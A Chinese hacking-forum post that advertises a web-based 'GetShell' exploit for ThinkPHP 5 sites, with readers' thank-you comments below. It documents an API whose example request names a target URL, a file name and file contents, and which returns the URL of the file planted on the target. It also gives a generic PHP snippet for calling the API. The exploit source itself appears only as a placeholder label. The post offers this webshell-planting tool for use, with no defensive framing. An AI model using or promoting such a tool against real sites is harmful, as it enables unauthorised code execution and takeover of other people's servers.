登陆 注册

ThinkPHP5.* GetShell.网页版EXP

Lzers 2019-06-28 ThinkPHP5GetShell网页版exp

QQ图片20190628000533.png

接口地址:/api.php
返回格式:json
请求方式:get/post
请求示例:/api.php?url=http://www.heibai.org&file=test.php&content=123456

请求参数说明:

1.png

返回参数说明:

2.png

返回示例:

{
    "code": 10001,
    "msg": "ok",
    "url": "https://www.heibai.org/test.php"
}


PHP演示:

<?php
header("Content-Type:text/html;charset=UTF-8");
date_default_timezone_set("PRC");
$请求参数名 = "内容";
$result = file_get_contents("API网址".请求参数名);
$arr=json_decode($result,true);
if ($arr['json参数名']==1) {
    echo "返回信息:",$arr['返回信息'];
} else {
    echo $arr['返回信息'];
}
?>

 exp代码


已有84条评论
  • 2019-07-22 16:27:17

    感谢大佬分享。

  • 2019-08-05 21:57:53

    感谢分享,学习一下!

  • 2019-11-20 02:19:30

    感谢大佬分享

  • 2020-04-01 13:52:55

    这个玩意好不好用啊。

  • 2020-04-01 13:53:19

    来看看,不知道好不好使用。

请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.